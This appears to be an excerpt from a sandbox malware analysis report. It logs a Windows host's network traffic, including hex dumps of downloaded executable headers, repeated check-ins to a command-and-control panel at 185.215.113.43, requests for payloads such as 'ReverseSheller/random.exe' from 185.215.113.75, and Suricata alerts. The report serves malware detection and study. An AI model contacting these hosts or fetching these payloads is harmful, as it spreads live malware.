00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:36:01 GMTContent-Type: application/octet-streamContent-Length: 4200448Last-Modified: Thu, 13 Feb 2025 09:10:47 GMTConnection: keep-aliveETag: "67adb717-401800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 ce 58 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 68 29 00 00 6e 30 00 00 00 00 00 00 b0 ac 00 00 10 00 00 00 b0 51 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 e0 ac 00 00 04 00 00 a1 7c 40 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 f0 5c 00 68 00 00 00 00 e0 5b 00 78 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 5c 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 5b 00 00 10 00 00 00 cc 23 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 78 0a 01 00 00 e0 5b 00 00 20 00 00 00 dc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 5c 00 00 02 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 33 00 00 00 5d 00 00 02 00 00 00 fe 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 69 6c 6e 78 72 66 64 00 00 1c 00 00 a0 90 00 00 f2 1b 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 65 67 6d 6b 61 75 62 00 10 00 00 00 a0 ac 00 00 04 00 00 00 f2 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 ac 00 00 22 00 00 00 f6 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:36:08 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Wed, 12 Feb 2025 04:58:31 GMTConnection: keep-aliveETag: "67ac2a77-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:36:19 GMTContent-Type: application/octet-streamContent-Length: 1764352Last-Modified: Sat, 08 Feb 2025 12:04:50 GMTConnection: keep-aliveETag: "67a74862-1aec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 15 88 a0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 7e 01 00 00 64 00 00 00 00 00 00 00 b0 45 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 da 99 1b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 91 45 00 57 00 00 00 55 10 02 00 69 00 00 00 00 00 02 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 01 00 00 10 00 00 00 d8 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 0c 04 00 00 00 00 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 02 00 00 02 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 20 02 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 66 72 71 61 62 68 6b 00 e0 19 00 00 c0 2b 00 00 d6 19 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 73 6c 64 6b 62 7a 00 10 00 00 00 a0 45 00 00 04 00 00 00 c6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 45 00 00 22 00 00 00 ca 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:36:24 GMTContent-Type: application/octet-streamContent-Length: 30720Last-Modified: Thu, 13 Feb 2025 05:04:07 GMTConnection: keep-aliveETag: "67ad7d47-7800"Accept-Ranges: bytesData Raw: 4d 5a 80 00 01 00 00 00 04 00 10 00 ff ff 00 00 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0a 24 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 4a 3e c4 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 01 48 00 76 00 00 00 00 00 00 00 00 00 00 81 2e 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 00 00 00 02 00 00 bd df 00 00 02 00 00 00 00 10 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c9 74 00 00 00 10 00 00 00 76 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 10 db d5 ee b9 49 c8 33 fb 2c 8d dd 10 7e 5f fe 45 7c fa 73 0d 9e 34 fd 5c 37 0e ee f0 dd 1b 49 d9 69 1d 71 bf 81 d2 2d 78 e1 b8 ef d0 3a a0 7f 37 86 92 da f1 56 92 9c ae 32 0b 4f 89 13 52 8b 90 39 1f b2 ed 4e 5d 97 5f 2d 5b 1d 57 a5 19 e7 e9 bc ae e4 63 58 00 5b 56 66 31 1f 1e 59 40 3a ab 2c ee 59 f4 17 87 ba 54 6b 79 c0 5f 70 ef c5 8e 98 5e 65 3b d6 c6 76 b1 0d d2 f3 4c 32 c0 de c3 85 f2 6d a1 11 3d eb 77 87 0a 49 7a e8 9c d4 8a 65 73 5d 89 08 87 11 51 03 af c8 cb 88 47 d9 7e d2 72 b1 0e 2d 0f ee 3a 6b 46 eb 27 71 86 08 a4 52 3d ad 8a dc 09 f7 83 99 59 24 6e d8 cc dc 96 38 ca c6 21 bb 9f 5a 46 f1 73 b8 da 56 7d 90 6e 20 95 0a 3e 61 c5 ac 19 c2 0c 82 d9 c9 28 6e 50 10 1d 89 12 f7 ea 67 c7 cf 6b c6 08 0e d6 80 87 5f 6c a3 81 15 69 d7 8f 0d 11 6c d2 2c 2e c9 10 ba 6c 00 65 51 d3 37 50 de a8 13 25 05 99 1f 66 da ac 4e eb 23 b9 f1 ad e5 21 88 09 22 58 1d cd ee ef ad 5d 87 6c 65 af 99 63 56 d6 96 10 2a 63 d7 ec c7 84 b9 28 58 28 a4 49 0d 5f 22 72 eb 20 8d 30 26 08 59 b4 5a 36 3b 5f fd 39 99 82 11 53 a7 09 aa d4 dc 7e 8c 5d 16 e5 74 7a d4 5b fe c7 e1 c5 24 53 13 c4 a3 1c 1b 8b 71 cc 81 ba 97 16 23 55 c0 5e 92 de 16 a0 bd 7c 81 56 73 c4 97 bd 68 cc d0 34 dc 81 f4 27 50 98 fd

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 30 32 39 37 37 42 32 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB02977B25982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/2062973237/xkV9ZML.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 32 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077209001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077992001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077993001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077994001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077995001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077996001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/mia_hined/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077997001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077998001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5377122953/KbSwZup.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 37 39 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1077999001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 38 30 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1078000001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 38 30 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1078001001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 38 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1078002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1296014716/PqodvBZ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 38 30 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1078003001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/2062973237/xkV9ZML.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Wed, 12 Feb 2025 21:03:48 GMTIf-None-Match: "67ad0cb4-5cc00"

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.75 185.215.113.75

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49937 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49959 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49954 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49967 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49971 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49987 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49981 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49993 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49999 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50000 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50008 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50006 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49995 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50012 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50017 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50019 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50021 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50024 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50026 -> 172.67.155.64:443
